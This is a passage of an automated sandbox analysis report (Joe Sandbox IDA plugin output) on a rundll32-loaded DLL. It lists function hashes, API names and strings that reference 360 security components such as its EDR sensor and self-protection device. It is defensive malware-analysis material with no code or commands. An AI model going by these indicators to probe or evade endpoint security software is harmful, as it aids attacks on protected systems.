                                                                                    • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                    • String ID: safemon\360EDRSensor.exe
                                                                                    • API String ID: 2297386589-1382049097
                                                                                    • Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                                    • Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
                                                                                    • Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                                    • Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                                    • String ID: safemon\360ExtHost.exe
                                                                                    • API String ID: 2297386589-1382862812
                                                                                    • Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                                    • Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
                                                                                    • Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                                    • Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                    • API String ID: 823179699-3913318428
                                                                                    • Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                                    • Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
                                                                                    • Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                                    • Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
                                                                                    • String ID:
                                                                                    • API String ID: 1109857607-0
                                                                                    • Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                                    • Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
                                                                                    • Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                                    • Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
                                                                                    • String ID:
                                                                                    • API String ID: 2337826640-0
                                                                                    • Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                                    • Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
                                                                                    • Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                                    • Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeString
                                                                                    • String ID:
                                                                                    • API String ID: 3341692771-0
                                                                                    • Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                                    • Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
                                                                                    • Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                                    • Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                    • String ID: L "$\\.\360SelfProtection
                                                                                    • API String ID: 3778458602-907869749
                                                                                    • Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                                    • Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
                                                                                    • Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                                    • Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 652292005-0
                                                                                    • Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                                    • Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
                                                                                    • Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                                    • Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcsstr$_errnomemmove
                                                                                    • String ID:
                                                                                    • API String ID: 3323953840-0
                                                                                    • Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                                    • Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
                                                                                    • Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                                    • Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Deinstall$ProviderProvider32$CleanupStartup
                                                                                    • String ID:
                                                                                    • API String ID: 348239931-0
                                                                                    • Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                                    • Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
                                                                                    • Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                                    • Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 195827-0
                                                                                    • Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                                    • Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
                                                                                    • Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                                    • Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 195827-0
                                                                                    • Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                                    • Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
                                                                                    • Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                                    • Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 195827-0
                                                                                    • Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                    • Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
                                                                                    • Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                                    • Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2343307612-0
                                                                                    • Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                    • Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
                                                                                    • Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                                    • Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpimemset
                                                                                    • String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
                                                                                    • API String ID: 3784069311-1340094651
                                                                                    • Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                    • Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
                                                                                    • Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                                    • Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                                    • String ID:
                                                                                    • API String ID: 3103530258-0
                                                                                    • Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                    • Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
                                                                                    • Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                                    • Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValuewcsstr
                                                                                    • String ID: "%s" %s$/elevated
                                                                                    • API String ID: 1248106594-1382985213
                                                                                    • Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                    • Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
                                                                                    • Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                    • Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B
                                                                                    • memset.MSVCRT ref: 00000001800689A4
                                                                                      • Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValuememset
                                                                                    • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                                    • API String ID: 733315865-1479031278
                                                                                    • Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                    • Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
                                                                                    • Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                    • Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
                                                                                    • String ID:
                                                                                    • API String ID: 3860525367-0
